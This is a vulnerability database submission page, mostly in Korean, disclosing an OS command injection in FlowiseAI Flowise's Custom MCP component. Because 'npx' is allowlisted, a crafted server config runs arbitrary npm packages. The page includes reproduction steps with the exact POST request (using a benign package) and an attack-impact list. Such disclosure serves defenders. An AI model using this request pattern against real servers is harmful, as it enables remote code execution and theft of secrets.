제출 #777660: FlowiseAI Flowise <= 3.0.12 OS Command Injection (CWE-78)정보

제목	FlowiseAI Flowise <= 3.0.12 OS Command Injection (CWE-78)
설명	# Technical Details A Remote Code Execution vulnerability exists in the Custom MCP (Model Context Protocol) component's `validateMCPServerConfig()` in `packages/components/nodes/tools/MCP/core.ts` of FlowiseAI Flowise. The command allowlist includes 'npx' which is an arbitrary code execution tool. When a user configures {"command":"npx","args":["-y","attacker-malicious-package"]}, the validation passes because npx is in the allowedCommands list and the args contain no dangerous patterns. This triggers child_process.spawn('npx', ['-y', 'attacker-malicious-package']) which downloads and executes arbitrary npm packages from the public registry with full server process privileges. # Vulnerable Code File: packages/components/nodes/tools/MCP/core.ts (line 269) Method: validateMCPServerConfig() Why: The allowedCommands list ['node', 'npx', 'python', 'python3', 'docker'] includes 'npx' which can download and execute arbitrary code. The argument validation (validateArgsForLocalFileAccess and validateCommandInjection) cannot detect this because package names are plain strings. # Reproduction 1. Deploy Flowise: docker run -d --name flowise-test -p 3001:3000 flowiseai/flowise:latest 2. Authenticate and get JWT cookie. 3. Send malicious MCP config: POST /api/v1/node-load-method/customMCP with {"loadMethod":"listActions","inputs":{"mcpServerConfig":"{\"command\":\"npx\",\"args\":[\"-y\",\"cowsay\"]}"}} 4. Verify execution: docker exec flowise-test ls -la /root/.npm/_npx/ shows npx cache directory created. # Impact - Full Remote Code Execution on the Flowise server. - Exfiltrate secrets (.env file, database credentials, LLM API keys). - Install persistence (cron jobs, SSH keys, backdoors). - Lateral movement via leaked credentials.
원천	⚠️ https://gist.github.com/YLChen-007/4442c386739b2087db1473be703b4ccd
사용자	Eric-a (UID 96353)
제출	2026. 03. 11. PM 03:04 (3 개월 ago)
모더레이션	2026. 05. 06. AM 09:40 (2 months later)
상태	중복
VulDB 항목	358753 [FlowiseAI Flowise 까지 3.0.x /tmp/pwn 권한 상승]
포인트들	0

◂ 이전 개요 다음 ▸

Might our Artificial Intelligence support you?

Check our Alexa App!